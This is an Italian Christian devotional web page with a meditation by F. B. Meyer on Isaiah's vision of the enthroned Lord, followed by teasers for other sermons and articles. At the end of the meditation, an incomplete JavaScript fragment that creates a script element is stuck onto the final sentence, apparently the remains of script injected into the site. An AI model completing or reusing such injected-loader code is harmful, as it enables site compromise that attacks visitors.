Meditazione del giorno: Il Signore esaltato

meyerfb

F. B. MEYER  –   “Nell’anno della morte del re Uzzia vidi il Signore seduto sopra un trono alto, molto elevato” (Isaia 6:1)

 –   Viviamo in tempi difficili e da sempre nella storia umana gli eventi esterni portano l’uomo a distrarsi e ad angosciarsi. Ma i servi di Dio vengono portati in un luogo segreto, il più alto, dove poter ammirare il nostro Dio che regna in eterno con giustizia e ordine. Il paese stava attraversando un periodo instabile di oscurità e angoscia che stavano portando ad un’imminente rivoluzione e proprio in questo periodo Isaia riuscì a ottenere la stabilità del trono di Dio.

“Molto elevato”, più alto di ogni altra autorità, potere o dominio in cielo, sulla terra e sotto la terra! Egli era coronato d’amore, “Sopra di Lui stavano i Serafini” e la parola Serafino deriva da fuoco ed i Serafini hanno la funzione di irradiare amore. Il trono è stato stabilito per portare solidità, giudizio e potere, sopra tutti questi attributi e sopra Dio regna sovrano l’Amore. Questa è la massima concezione possibile per i mortali, l’amore supremo. L’Agnello che fu immolato sta lì, sul Suo trono.

L’unico uomo in tutto Israele che ebbe l’opportunità di vedere Dio assiso sul Suo trono fu Isaia. In tutta umiltà salì al Tempio, in mezzo alla folla che invece era lì solo per una mera forma religiosa. Sembrava che ognuno di essi avesse bisogno di avere una visione rivelatrice più di lui, ma Isaia fu l’uomo che vide, che vide il Signore; fu l’unico uomo santo in tutto Israele che ebbe la grazia di avere un contatto diretto con Dio. Il resto degli Israeliti vide solo un Tempio, l’altare ed il rituale, ma Isaia vide i lembi del mantello che riempivano ogni angolo del luogo santo.

Non lasciamoci soddisfare dal ritualismo esteriore, dai sermoni, nonostante a volte siano magnifici! Coloro che sono umili e perseveranti nella ricerca di Dio riusciranno ad udire note che altri non possono udire, riusciranno a rilevare presenze che sfuggono agli sguardi ordinari, entreranno nel reame dello spirito che è chiuso per coloro che guardano solo all’esteriore.

Anche quando il mondo sia in tumulto, le maree si alzino, il Signore è potente: Egli è Colui che ha sconfitto la morte, che è risorto e asceso al cielo, Egli è il Signore dei signori, il Re dei re!var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

IO SO CHE IL MIO REDENTORE VIVE

di Agostino Masdea   –   Ma io so che il mio Redentore, vive e che alla fine si leverà sulla terra. Dopo che questa mia pelle sarà distrutta, nella mia carne vedrò Dio. Lo vedrò io stesso; i miei occhi lo contempleranno, e non un altro. Il mio cuore si strugge dentro di me. (Giobbe 19:25-27) – Giobbe, un uomo provato, in estrema difficoltà, prigioniero della sofferenza. a. – Il libro di Giobbe …
Leggi Tutto

BALSAMO DI GALAAD

 di LILIAN B. YEOMANS Tanto tempo fa, su una collina solitaria, tre croci, le vedo ancor! Tanto tempo fa il Salvatore disse, mentre chinava il Suo capo morente: «Tutto è compiuto». Balsamo di Galaad, guarisci le mie ferite, rendimi  interamente sano e forte, Tu sei la Medicina che io prendo, e subito la mia salute irrompe: «Tutto è compiuto».  Geremia 8:22: «Non c’è balsamo in Galaad? Non c’è laggiù nessun medico?» Che …
Leggi Tutto

IL VERO AMORE ASPETTA

True love waits         7 BUGIE SULL’AMORE   –    Prendiamo in esame sette bugie sull’amore e scopriremo la verità sul vero amore.   BUGIA N. 1: Il sesso crea fiducia! Una ragazza ci ha scritto la lettera seguente: «Sono alla continua ricerca d’amore. Ma l’unica forma di amore che conosco è quella fisica, il sesso. Nella mia vita sono già andata a letto con   …
Leggi Tutto

UNA SANA FAMIGLIA

di Philip Nunn  –  Studio sulla seconda lettera di Giovanni.  –  La seconda lettera di Giovanni è l’unica lettera apostolica indirizzata a una donna, “alla signora elette e ai suoi figli” (v.1). Alcuni commentatori suggeriscono che Giovanni stia usando un linguaggio simbolico dove “la signora eletta” si riferisce alla chiesa locale, e che quando alla fine scrive “ i figli della sorella eletta ti salutano” (v.13), si riferisce …
Leggi Tutto

RIGUARDANDO A GESU'

di  AGOSTINO MASDEA  –  “…deposto ogni fascio, e il peccato che è atto a darci impaccio, corriamo con perseveranza il palio propostoci,  riguardando a Gesù, capo, e compitor della fede; (Ebrei 12:1-2) (Diodati)   –   La lettera agli Ebrei ci mostra la gloria di Cristo attraverso la storia del popolo di Dio, l’Antico Testamento, cioè il tempo di preparazione per la salvezza. Ci rivela come nessun altro libro del N.T …
Leggi Tutto

L’ornamento di un vero Cristiano

di Dale Crowley  –  Cristiani, lasciate che Cristo si serva di voi in modo tale da rispecchiare in voi la sua natura divina affinché tutti possano rendersi conto che la vostra vita è stata rinnovata, che la vostra vecchia natura peccaminosa è stata trasformata e che siete rivestiti della vostra nuova natura divina. I Cristiani che hanno veramente offerto la loro vita a Cristo risorto, vivono una vita nuova …
Leggi Tutto

Chiamata al ministerio della Guarigione Divina

  La testimonianza personale di John G. Lake dalla sua chiamata al ministerio della Guarigione Divina sarà, ne siamo certi, di grande benedizione per i visitatori del sito. Il suo ministerio apostolico svolto dal 1908 al 1913, nel sud dell’Africa, fu certamente uno dei più potenti ministeri dai giorni della Chiesa primitiva. Egli ritornò in seguito a Spokane, nello Stato di Washington, dove 100.000 guarigioni furono registrate in …
Leggi Tutto

Dai nostri Culti